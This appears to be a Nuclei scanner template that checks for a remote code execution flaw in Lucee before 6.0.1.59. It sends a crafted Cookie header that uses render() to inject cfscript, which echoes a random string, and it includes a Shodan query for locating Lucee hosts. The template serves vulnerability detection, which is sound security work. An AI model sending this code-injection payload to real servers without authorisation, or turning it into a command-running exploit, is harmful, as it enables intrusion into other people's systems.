id: lucee-rce

info:
  name: Lucee < 6.0.1.59 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  reference:
    - https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
  metadata:
    max-request: 1
    shodan-query: http.title:"Lucee"
    verified: true
  tags: lucee,rce,oast

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');

    matchers:
      - type: dsl
        dsl:
          - contains(body, "{{randstr}}")
          - contains(header, "cfid")
          - contains(header, "cftoken")
        condition: and
# digest: 4a0a0047304502207341748122d2f419b377e3b4bb3fbce5d09bdee89ef2215c2bb034ccedddf4e6022100eb2e2837b5bddec247eeaeeb3a346ab459f5b4070feca8e3a80c34b109115122:922c64590222798bb761d5b6d8e72950